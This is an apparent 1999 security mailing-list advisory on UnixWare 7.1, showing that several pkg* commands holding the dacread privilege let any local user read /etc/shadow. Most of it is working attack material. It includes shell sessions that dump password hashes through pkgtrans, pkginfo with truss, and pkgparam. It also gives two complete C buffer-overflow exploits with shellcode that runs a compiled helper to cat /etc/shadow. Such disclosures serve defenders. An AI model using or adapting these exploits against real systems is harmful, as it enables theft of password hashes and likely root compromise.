
UnixWare pkg* command exploits


From: btellier () USA NET (Brock Tellier)
Date: Sat, 4 Dec 1999 18:42:54 MST


Greetings,

OVERVIEW
Most of UnixWare's pkg* commands can be abused by any local user to read
/etc/shadow. The password hashes obtained that way can be cracked offline, so
this should be treated as a probable root compromise.

BACKGROUND
Only tested on UnixWare 7.1.

DETAILS
The permissions for the UnixWare pkg commands are as follows:
bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam
/usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat
/usr/sbin/pkginstall
-r-xr-xr-x    1 bin      sys          176620 May 21  1999 /usr/bin/pkginfo
-r-xr-xr-x    1 root     sys          166784 May 21  1999 /usr/bin/pkgparam
-r-xr-xr-x    1 bin      bin          166216 May 21  1999 /usr/bin/pkgtrans
-r-xr-xr-x    1 root     sys            3288 May 21  1999
/usr/sadm/install/bin/pkgname
-rwxr-xr-x    1 root     bin           19436 May 21  1999 /usr/sbin/pkgcat
-r-x------    1 root     sys          179440 May 21  1999 /usr/sbin/pkgchk
-rwxr-xr-x    1 root     bin           19680 May 21  1999
/usr/sbin/pkginstall
bash-2.02$ 

Note that none of these have any elevated modebit-based privileges.  Now let's
check out /etc/security/tcb/privs:
bash-2.02$ cat /etc/security/tcb/privs | grep pkg
179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk
176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo
166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam
166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans
3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname
19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat
19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall

As far as I can tell, the pkgname program doesn't actually do anything, and
pkgchk is mode 0500 (root only), so an unprivileged user cannot exec it at all.
The rest of these programs can all be made to disclose /etc/shadow. They can
read it because the privs database grants them the "dacread" privilege, which
lets the process bypass discretionary access control -- the file's permission
bits and ownership -- for read and execute access only (not write).

Two of the exploits below (pkgcat and pkginstall) are buffer overflows whose
shellcode execs /tmp/pi. /tmp/pi is a small program that the exploit compiles
beforehand; it simply runs `cat /etc/shadow`. This works because a process
spawned by a prived program inherits that program's fixed privileges, so
/tmp/pi, and the cat it runs, keep pkgcat's or pkginstall's dacread and can
read the file. Note that /tmp/pi is a fixed name in a world-writable
directory: whoever plants a /tmp/pi first is the one whose code runs with
those privileges.

EXPLOIT OUTPUT
-------------- pkgtrans
For this exploit, download the attached "dut.tar" and follow the instructions
below.  dut.tar simply conforms to the pkgmap/info conventions and allows it
to read /etc/shadow.

bash-2.02$ cp dut.tar /tmp        
bash-2.02$ cd /tmp
bash-2.02$ tar xvf dut.tar
x dut/, 0 bytes, 0 tape blocks
x dut/pkginfo, 276 bytes, 1 tape block
x dut/pkgmap, 39 bytes, 1 tape block
x dut/install/, 0 bytes, 0 tape blocks
x dut/install/shadow symbolic link to /etc/shadow
bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow

The following packages are available:
  1  dut     Brock Tellier's pkgtrans exploit, install and cat
/tmp/pkgtrans.shadow  for your copy of /etc/shadow
             (IA32) .01a

Select package(s) you wish to process (or 'all' to process
all packages). (default: all) [?,??,quit]: 1
Transferring <dut> package instance to
      </tmp/pkgtrans.shadow> in datastream format
bash-2.02$ cat /tmp/pkgtrans.shadow | grep root
root:rfAf3OC7XHsj.:10925::::::
bash-2.02$  

------------- pkginfo

pkginfo itself only reports a format error, but the -rall option makes truss
log the data returned by every read() the traced process performs, so the
bytes pkginfo read from /etc/shadow end up in the trace file pkginfo.out:
bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat
pkginfo.out | grep "r o o t"
UX:pkginfo: ERROR: attempt to process package from </etc/shadow> failed
    - bad format in datastream table-of-contents
truss: cannot control child process, pid# 9188

- KILL TRUSS PROCESS FROM ANOTHER VT - 

Killed
9187:    r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d
bash-2.02$ 

------------- pkginstall

bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`:

UnixWare 7.1 pkginstall exploit prints/etc/shadow
Brock Tellier btellier () usa net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
...

-------------- pkgcat

bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`:

UnixWare 7.1 pkgcat exploit prints/etc/shadow
Brock Tellier btellier () usa net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
...

------------ pkgparam
bash-2.02$ pkgparam -f /etc/shadow
rfAf3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
...

EXPLOITS
--- uwpkgcat.c ---
/**
 ** UnixWare 7.1 /usr/sbin/pkgcat exploit 
 ** Prints contents of /etc/shadow (execing shell won't be enough here)
 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission
 ** problems.  Use offsets of +-100.
 **
 ** Compile cc -o uwpkgcat uwpkgcat.c
 ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`:
 **
 ** Brock Tellier btellier () usa net
 **/ 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * IA32 payload that the overflowed pkgcat is made to return into.  It execs
 * /tmp/pi, the helper that buildpi() compiles; the path sits in plain text
 * in the last literal.  The trailing 0xaa bytes are filler the code patches
 * at run time, so the payload must land in writable memory.  Presumably the
 * final call goes through the UnixWare lcall-7,0 syscall gate with
 * eax = 0x3b (execve) -- not verified here.  The bytes contain no NUL and
 * no '%' (0x25), which matters for how main() emits them.
 */
char scoshell[] =
    "\xeb\x1b\x5e"
    "\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11"
    "\x31\xc0\xb0\x3b"
    "\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56"
    "\xeb\x10\xe8\xe0\xff\xff\xff"
    "/tmp/pi"
    "\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

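/*
 * Write /tmp/pi.c and compile it to /tmp/pi, the helper the shellcode
 * execs.  The helper just runs "cat /etc/shadow"; per the advisory text,
 * the privileged program's fixed privileges (dacread) are inherited by the
 * processes it spawns, which is why that cat can read the file.
 *
 * Aborts if /tmp/pi.c cannot be created or closed (the original went on to
 * write through a NULL FILE*).  Only warns if the compile step fails, since
 * pkgcat would then exec a missing or stale /tmp/pi.
 *
 * NOTE(review): both names are fixed paths in the world-writable /tmp.
 * Another local user who pre-creates /tmp/pi, or plants a symlink at
 * /tmp/pi.c, gets their code run with pkgcat's privileges instead.  The
 * path is also baked into scoshell, so moving it means re-encoding the
 * payload.
 */
void buildpi(void) {
  FILE *fp;
  int rc;

  fp = fopen("/tmp/pi.c", "w");
  if (fp == NULL) {
    perror("/tmp/pi.c");
    exit(1);
  }
  /* CODE holds no conversion specifiers, but keep it out of the format
   * argument anyway. */
  fputs(CODE, fp);
  if (fclose(fp) != 0) {
    perror("/tmp/pi.c");
    exit(1);
  }

  rc = system("cc -o /tmp/pi /tmp/pi.c");
  if (rc != 0)
    fprintf(stderr, "warning: building /tmp/pi failed (status %d)\n", rc);
}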

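/*
 * Entry point.  Emits the oversized argument for "pkgcat -s" on stdout so
 * the caller can splice it in with backticks (see the header comment).
 *
 * Usage: uwpkgcat [offset [buflen]]
 *   offset  signed adjustment added to the base return address 0x8046b75
 *           (default 100 when no arguments are given).
 *   buflen  total payload length in bytes, at most LEN.  Defaults to 3000
 *           with no arguments and to LEN when only offset is given; the
 *           original behaved this way, so it is kept.
 *
 * Payload layout, low to high address:
 *   NOP sled | scoshell | repeated return address | ':'
 * The base address and the +/-100 offset range come from the author's
 * UnixWare 7.1 / IA32 box; nothing here derives them.
 *
 * Side effect: compiles /tmp/pi via buildpi() once the arguments are
 * accepted.  Exit status 0 on success, 1 on an argument or write error.
 */
int main(int argc, char *argv[]) {

long int offset = 100;
int buflen = 3000;
long int addr;
unsigned int slot;
size_t sclen;
int i;
char *end;
char buf[LEN];

 /* Check the command line before buildpi() so a usage error does not
  * leave /tmp/pi.c and /tmp/pi behind. */
 if (argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  exit(1);
 }
 if (argc >= 2) {
  offset = strtol(argv[1], &end, 10);
  if (end == argv[1] || *end != '\0') {
   fprintf(stderr, "Error: bad offset '%s'\n", argv[1]);
   exit(1);
  }
  /* One argument: the original used the full LEN here, not 3000. */
  buflen = LEN;
 }
 if (argc == 3) {
  long int n = strtol(argv[2], &end, 10);
  if (end == argv[2] || *end != '\0' || n < 1 || n > LEN) {
   fprintf(stderr, "Error: buffer must be between 1 and %d\n", LEN);
   exit(1);
  }
  buflen = (int)n;
 }

 sclen = strlen(scoshell);
 /* The layout must fit inside buflen: sled up to buflen/2, the shellcode,
  * the two alignment bytes and at least one 4-byte address slot.  The
  * original never checked this, nor that buflen <= LEN (stack overflow in
  * the exploit itself). */
 if ((size_t)buflen / 2 + sclen + 2 + 4 > (size_t)buflen) {
  fprintf(stderr, "Error: buffer of %d bytes is too small for the payload\n",
          buflen);
  exit(1);
 }

 buildpi();

 addr = 0x8046b75 + offset;

 fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints");
 fprintf(stderr, "/etc/shadow\n");
 fprintf(stderr, "Brock Tellier btellier () usa net\n\n");
 /* The original printed addr+offset here, i.e. the offset added twice;
  * the value actually written into the payload is addr. */
 fprintf(stderr, "Using addr: 0x%lx\n", (unsigned long)addr);

 memset(buf, NOP, (size_t)buflen);
 memcpy(buf + buflen / 2, scoshell, sclen);

 /* Fill the rest with the return address.  The +2 start keeps the 4-byte
  * writes on the same alignment the author used; presumably it lines them
  * up with the saved return address -- not re-derived here.  memcpy of a
  * 4-byte unsigned int replaces the original *(int *)&buf[i] store, which
  * was unaligned; the byte order matches on IA32, the only target. */
 slot = (unsigned int)addr;
 for (i = (int)(buflen / 2 + sclen) + 2; i < buflen - 4; i += 4)
  memcpy(&buf[i], &slot, 4);
 buf[buflen - 1] = ':';

 /* buf is not NUL-terminated and the address bytes can include '%', so it
  * must not go through printf(buf) as the original did: write exactly
  * buflen bytes instead. */
 if (fwrite(buf, 1, (size_t)buflen, stdout) != (size_t)buflen) {
  perror("stdout");
  exit(1);
 }
 return 0;
}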
------

--- uwpkgi.c ---
/**
 ** UnixWare 7.1 /usr/sbin/pkginstall exploit 
 ** Prints contents of /etc/shadow (execing shell won't be enough here)
 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission
 ** problems.  Use offsets of +-100.
 **
 ** Compile cc -o uwpkgi uwpkgi.c
 ** run /usr/sbin/pkginstall -s `./uwpkgi 100`:
 **
 ** Brock Tellier btellier () usa net
 **/ 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * IA32 payload that the overflowed pkginstall is made to return into.  It
 * execs /tmp/pi, the helper that buildpi() compiles; the path sits in plain
 * text in the last literal.  The trailing 0xaa bytes are filler the code
 * patches at run time, so the payload must land in writable memory.
 * Presumably the final call goes through the UnixWare lcall-7,0 syscall
 * gate with eax = 0x3b (execve) -- not verified here.  The bytes contain
 * no NUL and no '%' (0x25), which matters for how main() emits them.
 */
char scoshell[] =
    "\xeb\x1b\x5e"
    "\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11"
    "\x31\xc0\xb0\x3b"
    "\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56"
    "\xeb\x10\xe8\xe0\xff\xff\xff"
    "/tmp/pi"
    "\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

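/*
 * Write /tmp/pi.c and compile it to /tmp/pi, the helper the shellcode
 * execs.  The helper just runs "cat /etc/shadow"; per the advisory text,
 * the privileged program's fixed privileges (dacread) are inherited by the
 * processes it spawns, which is why that cat can read the file.
 *
 * Aborts if /tmp/pi.c cannot be created or closed (the original went on to
 * write through a NULL FILE*).  Only warns if the compile step fails, since
 * pkginstall would then exec a missing or stale /tmp/pi.
 *
 * NOTE(review): both names are fixed paths in the world-writable /tmp.
 * Another local user who pre-creates /tmp/pi, or plants a symlink at
 * /tmp/pi.c, gets their code run with pkginstall's privileges instead.
 * The path is also baked into scoshell, so moving it means re-encoding
 * the payload.
 */
void buildpi(void) {
  FILE *fp;
  int rc;

  fp = fopen("/tmp/pi.c", "w");
  if (fp == NULL) {
    perror("/tmp/pi.c");
    exit(1);
  }
  /* CODE holds no conversion specifiers, but keep it out of the format
   * argument anyway. */
  fputs(CODE, fp);
  if (fclose(fp) != 0) {
    perror("/tmp/pi.c");
    exit(1);
  }

  rc = system("cc -o /tmp/pi /tmp/pi.c");
  if (rc != 0)
    fprintf(stderr, "warning: building /tmp/pi failed (status %d)\n", rc);
}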

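/*
 * Entry point.  Emits the oversized argument for "pkginstall -s" on stdout
 * so the caller can splice it in with backticks (see the header comment).
 *
 * Usage: uwpkgi [offset [buflen]]
 *   offset  signed adjustment added to the base return address 0x8046b75
 *           (default 100 when no arguments are given).
 *   buflen  total payload length in bytes, at most LEN.  Defaults to 3000
 *           with no arguments and to LEN when only offset is given; the
 *           original behaved this way, so it is kept.
 *
 * Payload layout, low to high address:
 *   NOP sled | scoshell | repeated return address | ':'
 * The base address and the +/-100 offset range come from the author's
 * UnixWare 7.1 / IA32 box; nothing here derives them.
 *
 * Side effect: compiles /tmp/pi via buildpi() once the arguments are
 * accepted.  Exit status 0 on success, 1 on an argument or write error.
 */
int main(int argc, char *argv[]) {

long int offset = 100;
int buflen = 3000;
long int addr;
unsigned int slot;
size_t sclen;
int i;
char *end;
char buf[LEN];

 /* Check the command line before buildpi() so a usage error does not
  * leave /tmp/pi.c and /tmp/pi behind. */
 if (argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  exit(1);
 }
 if (argc >= 2) {
  offset = strtol(argv[1], &end, 10);
  if (end == argv[1] || *end != '\0') {
   fprintf(stderr, "Error: bad offset '%s'\n", argv[1]);
   exit(1);
  }
  /* One argument: the original used the full LEN here, not 3000. */
  buflen = LEN;
 }
 if (argc == 3) {
  long int n = strtol(argv[2], &end, 10);
  if (end == argv[2] || *end != '\0' || n < 1 || n > LEN) {
   fprintf(stderr, "Error: buffer must be between 1 and %d\n", LEN);
   exit(1);
  }
  buflen = (int)n;
 }

 sclen = strlen(scoshell);
 /* The layout must fit inside buflen: sled up to buflen/2, the shellcode,
  * the two alignment bytes and at least one 4-byte address slot.  The
  * original never checked this, nor that buflen <= LEN (stack overflow in
  * the exploit itself). */
 if ((size_t)buflen / 2 + sclen + 2 + 4 > (size_t)buflen) {
  fprintf(stderr, "Error: buffer of %d bytes is too small for the payload\n",
          buflen);
  exit(1);
 }

 buildpi();

 addr = 0x8046b75 + offset;

 fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints");
 fprintf(stderr, "/etc/shadow\n");
 fprintf(stderr, "Brock Tellier btellier () usa net\n\n");
 /* The original printed addr+offset here, i.e. the offset added twice;
  * the value actually written into the payload is addr. */
 fprintf(stderr, "Using addr: 0x%lx\n", (unsigned long)addr);

 memset(buf, NOP, (size_t)buflen);
 memcpy(buf + buflen / 2, scoshell, sclen);

 /* Fill the rest with the return address.  The +2 start keeps the 4-byte
  * writes on the same alignment the author used; presumably it lines them
  * up with the saved return address -- not re-derived here.  memcpy of a
  * 4-byte unsigned int replaces the original *(int *)&buf[i] store, which
  * was unaligned; the byte order matches on IA32, the only target. */
 slot = (unsigned int)addr;
 for (i = (int)(buflen / 2 + sclen) + 2; i < buflen - 4; i += 4)
  memcpy(&buf[i], &slot, 4);
 buf[buflen - 1] = ':';

 /* buf is not NUL-terminated and the address bytes can include '%', so it
  * must not go through printf(buf) as the original did: write exactly
  * buflen bytes instead. */
 if (fwrite(buf, 1, (size_t)buflen, stdout) != (size_t)buflen) {
  perror("stdout");
  exit(1);
 }
 return 0;
}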
------

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net


Attachment: dut.tar (application/x-tar)

